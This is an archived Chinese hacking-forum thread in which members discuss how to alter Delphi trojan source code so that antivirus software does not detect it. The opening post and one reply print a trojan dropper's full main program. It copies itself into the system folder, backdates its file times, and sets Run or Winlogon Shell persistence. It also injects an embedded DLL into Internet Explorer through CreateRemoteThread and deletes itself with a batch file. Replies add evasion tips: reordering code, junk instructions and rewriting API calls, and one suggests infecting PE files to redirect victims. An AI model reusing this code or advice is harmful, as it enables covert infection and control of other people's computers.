[讨论]delphi如何修改木马源码免杀
[讨论]delphi如何修改木马源码免杀议题作者:qqqqaz
信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])
想修改木马源码来免杀,打乱顺序,改版本,函数名?
通常server端我用nop 填充,client 端我改函数名,server端一个文件得容易改源码来免杀。
如果server端有dll文件已免杀,dll转res文件,加在main.dpr中,main 代码如下,请教如何修改才免杀,或者改其中得单元文件,还有鸽子代码也是同样的吗?:
program Main;
uses
windows,
RejoiceBase,
SysUtils2,
SysUtils,
tlhelp32,
Reg;
{$L 'SRT.obj'}
{$R RSRC.RES}
//const
var
{ ExeFiles: PChar='3885B37550B70C7A';
DLLFiles: PChar='39E145AC78292F80';
IEFiles: PChar ='A80D2686D0D48FB4446382AAE7FCCA8A';}
ExeFiles: PChar = 'EXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
DLLFiles: PChar = 'LXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
IEFiles: PChar = 'HXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
PID: DWORD;
Process: DWORD;
DllAllpath: string;
StartInfo: TStartupInfo;
ProcInfo: TProcessInformation;
function xVirtualFreeEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LOngWord; dwFreeType: LongWord): Boolean; stdcall; external;
function xCreateRemoteThread(hProcess: LongWord; lpThreadAttributes: Pointer; dwStackSize: LongWord; lpStartAddress: Pointer; lpParameter: Pointer; dwCreationFlags: LongWord; lpThreadId: Pointer): LongWord; stdcall; external;
function FileExists(pszPath: string): BOOL; stdcall; external 'shlwapi.dll' Name 'PathFileExistsA';
function xVirtualAllocEx(hProcess: LongWord; lpAddress: Pointer; dwSize: LongWord; flAllocationType: LongWord; flProtect: LongWord): Pointer; stdcall; external;
//----------------修改文件时间函数
type
// indicates the file time to set, used by SetFileTimesHelper and SetDirTimesHelper
TFileTimes = (ftLastAccess, ftLastWrite, ftCreation);
function SetFileTimesHelper(const FileName: string; const DateTime: TDateTime; Times: TFileTimes): Boolean;
var
Handle: THandle;
FileTime: TFileTime;
SystemTime: TSystemTime;
begin
Result := False;
Handle := CreateFile(PChar(FileName), GENERIC_WRITE, FILE_SHARE_READ, nil,OPEN_EXISTING, 0, 0);
if Handle <> INVALID_HANDLE_VALUE then
try
//SysUtils.DateTimeToSystemTime(DateTimeToLocalDateTime(DateTime), SystemTime);
SysUtils.DateTimeToSystemTime(DateTime, SystemTime);
if Windows.SystemTimeToFileTime(SystemTime, FileTime) then
begin
case Times of
ftLastAccess:
Result := SetFileTime(Handle, nil, @FileTime, nil);
ftLastWrite:
Result := SetFileTime(Handle, nil, nil, @FileTime);
ftCreation:
Result := SetFileTime(Handle, @FileTime, nil, nil);
end;
end;
finally
CloseHandle(Handle);
end;
end;
function SetFileLastAccess(const FileName: string; const DateTime: TDateTime): Boolean;
begin
Result := SetFileTimesHelper(FileName, DateTime, ftLastAccess);
end;
function SetFileLastWrite(const FileName: string; const DateTime: TDateTime): Boolean;
begin
Result := SetFileTimesHelper(FileName, DateTime, ftLastWrite);
end;
function SetFileCreation(const FileName: string; const DateTime: TDateTime): Boolean;
begin
Result := SetFileTimesHelper(FileName, DateTime, ftCreation);
end;
//----------------修改文件时间函数
procedure ExtDelMe;
var
F: textfile;
BatchFileName: string;
ProcessInfo: TProcessInformation;
StartUpInfo: TStartupInfo;
begin
DelValue(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp', 'NoRealMode');
BatchFileName := Gesy + 'Deleteme.bat';
AssignFile(F, BatchFileName);
Rewrite(F);
WriteLn(F, ':try');
WriteLn(F, 'del "' + ParamStr(0) + '"');
WriteLn(F, 'if exist "' + ParamStr(0) + '"' + ' goto try');
WriteLn(F, 'del %0');
CloseFile(F);
FillChar(StartUpInfo, SizeOf(StartUpInfo), $00);
StartUpInfo.dwFlags := STARTF_USESHOWWINDOW;
StartUpInfo.wShowWindow := SW_HIDE;
if CreateProcess(nil, PChar(BatchFileName), nil, nil, False, IDLE_PRIORITY_CLASS, nil, nil, StartUpInfo, ProcessInfo) then
begin
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
end;
end;
function RandomFilename(aFilename: string): string;
var
Path, Filename, Ext: string;
begin
Result := aFilename;
Path := ExtractFilepath(aFilename);
Ext := ExtractFileExt(aFilename);
Filename := ExtractFilename(aFilename);
if Length(Ext) > 0 then
Filename := Copy(Filename, 1, Length(Filename) - Length(Ext));
repeat
Result := Path + Filename + inttoStr(Random(9999)) + Ext;
until not FileExists(Result);
end;
function GetProcessID(sProcName: string): Integer;
var
hProcSnap: THandle;
pe32: TProcessEntry32;
begin
Result := -1;
hProcSnap := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
if hProcSnap = INVALID_HANDLE_VALUE then Exit;
pe32.dwSize := SizeOf(ProcessEntry32);
if Process32First(hProcSnap, pe32) = True then
while Process32Next(hProcSnap, pe32) = True do
begin
if AnsiStricomp(PChar(ExtractFilename(pe32.szExefile)), PChar(ExtractFilename(sProcName))) = 0 then
begin
Result := pe32.th32ProcessID;
break;
end;
end;
CloseHandle(hProcSnap);
end;
//插入进程
function InjectLibrary(Process: LongWord; DLLPath: pChar): Boolean;
var
BytesWritten: DWORD;
Thread: DWORD;
ThreadID: DWORD;
Parameters: Pointer;
begin
Result := False;
Parameters := xVirtualAllocEx(Process, nil, 4096, MEM_COMMIT, PAGE_READWRITE);
if Parameters = nil then Exit;
WriteProcessMemory(Process, Parameters, Pointer(DLLPath), 4096, BytesWritten);
Thread := xCreateRemoteThread(Process, nil, 0, GetProcAddress(GetModuleHandle('KERNEL32.DLL'), 'LoadLibraryA'), Parameters, 0, @ThreadId);
WaitForSingleObject(Thread, INFINITE);
xVirtualFreeEx(Process, Parameters, 0, MEM_RELEASE);
if Thread = 0 then Exit;
CloseHandle(Thread);
Result := True;
end;
var
isSetup: Bool;
SetupPathName: string;
begin
{ ExeFiles := pchar(DeCryptStr(ExeFiles,'bwindlovexiaohan'));
DLLFiles := PChar(DeCryptStr(DLLFiles,'bwindlovexiaohan'));
IEFiles := PChar(DeCryptStr(IEFiles,'bwindlovexiaohan')); }
SetupPathName := Gesy + ExeFiles;
if (CompareText(paramstr(0), SetupPathName) <> 0) then
begin
try
if FileExists(SetupPathName) then
begin
FilesetAttr(SetupPathName, 0);
DeleteFile(SetupPathName);
if FileExists(SetupPathName) then
begin
Halt;
Exit;
end;
end;
CopyFile(pchar(paramstr(0)), pchar(SetupPathName), False);
SetFileTimesHelper(SetupPathName,Now-1000,ftLastWrite);
SetFileTimesHelper(SetupPathName,Now-1000,ftLastWrite);
SetFileTimesHelper(SetupPathName,Now-1000,ftCreation);
except
end;
isSetup := True;
if judgesys = 3 then
begin
Reg.AddValue(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', 'Shell', pchar('Explorer.exe '+Gesy+ ExeFiles), 1);
end
else
begin
Reg.AddValue(HKEY_CURRENT_USER, 'SoftWare\Microsoft\Windows\CurrentVersion\Run', ExeFiles, pchar(Gesy + ExeFiles), 1);
end;
end;
if FindWindow('Rejoice_3.2', 'Windows IDE') = 0 then
begin
DllAllpath := Gesy + DLLFiles;
try
FilesetAttr(DllAllpath, 0);
DeleteFile(DllAllpath); {删除现有的DLL文件}
except
end;
if FileExists(DllAllpath) then {如果删除失败,则改名}
begin
DllAllpath := RandomFilename(DllAllpath);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
end;
if ExtractRes('dllfile', 'mydll', DllAllpath) then {生成新的DLL插入文件}
begin
if IEFiles = 'IEXPLORE.EXE' then
CreateProcess(nil, PChar(IEPath), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
PID := GetProcessID(IEFiles);
Process := OpenProcess(PROCESS_ALL_ACCESS, False, PID); {打开要潜入的进程}
FilesetAttr(DllAllpath, 0);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
InjectLibrary(Process, Pchar(DllAllpath));
end;
end;
if isSetup then
Begin
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
ExtDelMe;
end;
Halt;
end.
帖子24 精华[url=http://forum.eviloctal.com/digest.php?authorid=62786]0[/url] 积分68 阅读权限40 在线时间210 小时 注册时间2006-8-31 最后登录2007-5-11 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=62786]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=131443&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=131443&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-62786.html]qqqqaz[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 有鸽子代码也是同样的吗?鸽子代码如何改免杀,请大家指教指教
帖子24 精华[url=http://forum.eviloctal.com/digest.php?authorid=62786]0[/url] 积分68 阅读权限40 在线时间210 小时 注册时间2006-8-31 最后登录2007-5-11 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=62786]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=70829&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=70829&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=猎头&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]您知道您年薪应是多少?[/url]
[url=http://forum.eviloctal.com/space-uid-61555.html]ch4o.jt[/url] [img]http://forum.eviloctal.com/images/avatars/pw/samba2.gif[/img]
晶莹剔透§烈日灼然 [s:70]
把主代码写成一个过程,然后在后面调用这个过程就OK了。。。
这方法过不了NOD32,它是查杀API函数的~[s:92]
[s:81] 鸽子的代码也一样,如果针对特征码查杀的话,只要打乱一下主代码的顺序编译就OK了...
帖子21 精华[url=http://forum.eviloctal.com/digest.php?authorid=61555]0[/url] 积分76 阅读权限40 在线时间23 小时 注册时间2006-8-15 最后登录2007-6-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=61555]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=70835&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=70835&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-62786.html]qqqqaz[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 我不是很明白,可否举个例程,或用以上的代码,多谢你的指点
帖子24 精华[url=http://forum.eviloctal.com/digest.php?authorid=62786]0[/url] 积分68 阅读权限40 在线时间210 小时 注册时间2006-8-31 最后登录2007-5-11 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=62786]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=70842&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=70842&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-60773.html]icexiaoye[/url] [img]http://forum.eviloctal.com/customavatars/60773.jpg[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] [s:75] 我问题也看的晕
有了原代码还怕不能免杀????
能不能把问题说明白点玩世不恭彼此 ⌒ ˇ互相鼓励信任 認眞體驗每⒈兲.!﹏演藝⒉.個亾啲莞鎂傳奇( [淇]儭滗.
[url=http://wpa.qq.com/msgrd?V=1&Uin=119419178&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子728 精华[url=http://forum.eviloctal.com/digest.php?authorid=60773]4[/url] 积分5182 阅读权限100 性别男 在线时间255 小时 注册时间2006-8-7 最后登录2008-7-14 [url=http://icexiaoye.ch]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=60773]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=70856&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=70856&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=软件外包&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]软件项目外包[/url]
[url=http://forum.eviloctal.com/space-uid-63967.html]qq998[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 有了源代码.怎么具体做免杀.阿.有例子吗?请问楼上.怎么"打乱一下主代码的顺序编译"???是否可以给一个例子.谢谢.
帖子6 精华[url=http://forum.eviloctal.com/digest.php?authorid=63967]0[/url] 积分23 阅读权限40 性别男 在线时间59 小时 注册时间2006-9-15 最后登录2008-7-17 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=63967]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=70860&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=70860&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-63967.html]qq998[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 那如何避开"API函数查到"??? [s:46] [s:46]
帖子6 精华[url=http://forum.eviloctal.com/digest.php?authorid=63967]0[/url] 积分23 阅读权限40 性别男 在线时间59 小时 注册时间2006-9-15 最后登录2008-7-17 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=63967]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=70861&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=70861&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-60773.html]icexiaoye[/url] [img]http://forum.eviloctal.com/customavatars/60773.jpg[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 引用:
这里是引用第[5 楼]的qq998于2006-10-23 16:15发表的:
有了源代码.怎么具体做免杀.阿.有例子吗?请问楼上.怎么"打乱一下主代码的顺序编译"???是否可以给一个例子.谢谢.
程序过程(比如3部分,不同功能)
A
B
C
你改成
C
B
A玩世不恭彼此 ⌒ ˇ互相鼓励信任 認眞體驗每⒈兲.!﹏演藝⒉.個亾啲莞鎂傳奇( [淇]儭滗.
[url=http://wpa.qq.com/msgrd?V=1&Uin=119419178&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子728 精华[url=http://forum.eviloctal.com/digest.php?authorid=60773]4[/url] 积分5182 阅读权限100 性别男 在线时间255 小时 注册时间2006-8-7 最后登录2008-7-14 [url=http://icexiaoye.ch]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=60773]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=70866&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=70866&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-60773.html]icexiaoye[/url] [img]http://forum.eviloctal.com/customavatars/60773.jpg[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 引用:
这里是引用第[6 楼]的qq998于2006-10-23 16:20发表的:
那如何避开"API函数查到"??? [s:46] [s:46]
汗~
不太清楚是NOD32通过什么拦截API的
估计是HOOK API吧 [s:64]玩世不恭彼此 ⌒ ˇ互相鼓励信任 認眞體驗每⒈兲.!﹏演藝⒉.個亾啲莞鎂傳奇( [淇]儭滗.
[url=http://wpa.qq.com/msgrd?V=1&Uin=119419178&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子728 精华[url=http://forum.eviloctal.com/digest.php?authorid=60773]4[/url] 积分5182 阅读权限100 性别男 在线时间255 小时 注册时间2006-8-7 最后登录2008-7-14 [url=http://icexiaoye.ch]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=60773]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=70867&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=70867&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-62786.html]qqqqaz[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 多谢指教,可能我的表达能力不太好
简单的说,我不知道鸽子的和以上的server端如何才能有效的修改代码免杀
'把主代码写成一个过程,然后在后面调用这个过程就OK了'这一句话我不是很明白,可否举个例程,主代码是指main.pas吗?
帖子24 精华[url=http://forum.eviloctal.com/digest.php?authorid=62786]0[/url] 积分68 阅读权限40 在线时间210 小时 注册时间2006-8-31 最后登录2007-5-11 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=62786]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=70989&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=70989&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-61555.html]ch4o.jt[/url] [img]http://forum.eviloctal.com/images/avatars/pw/samba2.gif[/img]
晶莹剔透§烈日灼然 [s:92] [s:92] [s:92]
无语....
procedure fuckmain; //把主代码写成一个过程...
var
isSetup: Bool;
SetupPathName: string;
begin
{ ExeFiles := pchar(DeCryptStr(ExeFiles,'bwindlovexiaohan'));
DLLFiles := PChar(DeCryptStr(DLLFiles,'bwindlovexiaohan'));
IEFiles := PChar(DeCryptStr(IEFiles,'bwindlovexiaohan')); }
SetupPathName := Gesy + ExeFiles;
if (CompareText(paramstr(0), SetupPathName) <> 0) then
begin
try
if FileExists(SetupPathName) then
begin
FilesetAttr(SetupPathName, 0);
DeleteFile(SetupPathName);
if FileExists(SetupPathName) then
begin
Halt;
Exit;
end;
end;
CopyFile(pchar(paramstr(0)), pchar(SetupPathName), False);
SetFileTimesHelper(SetupPathName,Now-1000,ftLastWrite);
SetFileTimesHelper(SetupPathName,Now-1000,ftLastWrite);
SetFileTimesHelper(SetupPathName,Now-1000,ftCreation);
except
end;
isSetup := True;
if judgesys = 3 then
begin
Reg.AddValue(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', 'Shell', pchar('Explorer.exe '+Gesy+ ExeFiles), 1);
end
else
begin
Reg.AddValue(HKEY_CURRENT_USER, 'SoftWare\Microsoft\Windows\CurrentVersion\Run', ExeFiles, pchar(Gesy + ExeFiles), 1);
end;
end;
if FindWindow('Rejoice_3.2', 'Windows IDE') = 0 then
begin
DllAllpath := Gesy + DLLFiles;
try
FilesetAttr(DllAllpath, 0);
DeleteFile(DllAllpath); {删除现有的DLL文件}
except
end;
if FileExists(DllAllpath) then {如果删除失败,则改名}
begin
DllAllpath := RandomFilename(DllAllpath);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
end;
if ExtractRes('dllfile', 'mydll', DllAllpath) then {生成新的DLL插入文件}
begin
if IEFiles = 'IEXPLORE.EXE' then
CreateProcess(nil, PChar(IEPath), nil, nil, False, CREATE_SUSPENDED, nil, nil, StartInfo, ProcInfo);
PID := GetProcessID(IEFiles);
Process := OpenProcess(PROCESS_ALL_ACCESS, False, PID); {打开要潜入的进程}
FilesetAttr(DllAllpath, 0);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
InjectLibrary(Process, Pchar(DllAllpath));
end;
end;
if isSetup then
Begin
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftLastWrite);
SetFileTimesHelper(DllAllpath,Now-1000,ftCreation);
ExtDelMe;
end;
Halt;
end;
begin
fuckmain; //调用该过程...
end.
或者建立另一个单元文件,把上面调用到的一些过程和函数打乱顺序放进去,然后在头部调用该单元文件就OK了.. [s:73]
帖子21 精华[url=http://forum.eviloctal.com/digest.php?authorid=61555]0[/url] 积分76 阅读权限40 在线时间23 小时 注册时间2006-8-15 最后登录2007-6-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=61555]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=71008&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=71008&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-64507.html]asm[/url] [img]http://forum.eviloctal.com/customavatars/64507.jpg[/img]
运维管理组
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 有了源码,再添加一些新的功能,例如恶作剧,搜寻符合' Signature DWORD ? ' 标志
的文件写入,只要打开windows下的PE,转向到自己的站点,这样又有肉鸡,也有流量.. [s:70]
在加入新的代码的时候,也许杀毒软件病毒库检测不出来 :)游戏吧 http://www.game8.cc/MyBlog http://www.asm32.cn
帖子1598 精华[url=http://forum.eviloctal.com/digest.php?authorid=64507]30[/url] 积分8742 阅读权限150 性别男 在线时间954 小时 注册时间2006-9-21 最后登录2008-7-20 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=64507]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=71030&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=71030&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-62040.html]catking09[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 照楼上理解那么增加部分安全代码也有效果咯? 杀不杀的判定根据一般是什么啊?
帖子15 精华[url=http://forum.eviloctal.com/digest.php?authorid=62040]0[/url] 积分55 阅读权限40 在线时间19 小时 注册时间2006-8-21 最后登录2007-11-13 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=62040]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=71054&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=71054&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-64507.html]asm[/url] [img]http://forum.eviloctal.com/customavatars/64507.jpg[/img]
运维管理组
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 引用:
这里是引用第[12 楼]的catking09于2006-10-24 20:23发表的:
照楼上理解那么增加部分安全代码也有效果咯? 杀不杀的判定根据一般是什么啊?
添加代码能否免杀,我没测试过,只是做个估计,但是自己写个添加花指令,例如下面一个小小的东西
JNZ _test
JN _test
_test:
免杀效果应该不错...
杀不杀的判断根据,就是杀毒软件病毒分析师定的特征码和类似特征码
个人意见
[s:66]游戏吧 http://www.game8.cc/MyBlog http://www.asm32.cn
帖子1598 精华[url=http://forum.eviloctal.com/digest.php?authorid=64507]30[/url] 积分8742 阅读权限150 性别男 在线时间954 小时 注册时间2006-9-21 最后登录2008-7-20 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=64507]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=71057&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=71057&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-6407.html]ni7wo3[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 NOD32 好像是检查导入表
放在过程或函数里能免杀,相当加了 CALL .....
帖子9 精华[url=http://forum.eviloctal.com/digest.php?authorid=6407]0[/url] 积分34 阅读权限40 在线时间14 小时 注册时间2005-6-18 最后登录2008-1-5 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=6407]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=25506&repquote=71068&extra=page%3D1&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=25506&pid=71068&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-1813.html]sobiny[/url] [img]http://forum.eviloctal.com/images/avatars/pw/kawayi3.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 如果真是查API的话
就不要那个API的函数就是了吧
最多就是麻烦一点。
API函数给的就是方便而已。
如果你有那个能力,就重写功能相同的函数来代替。
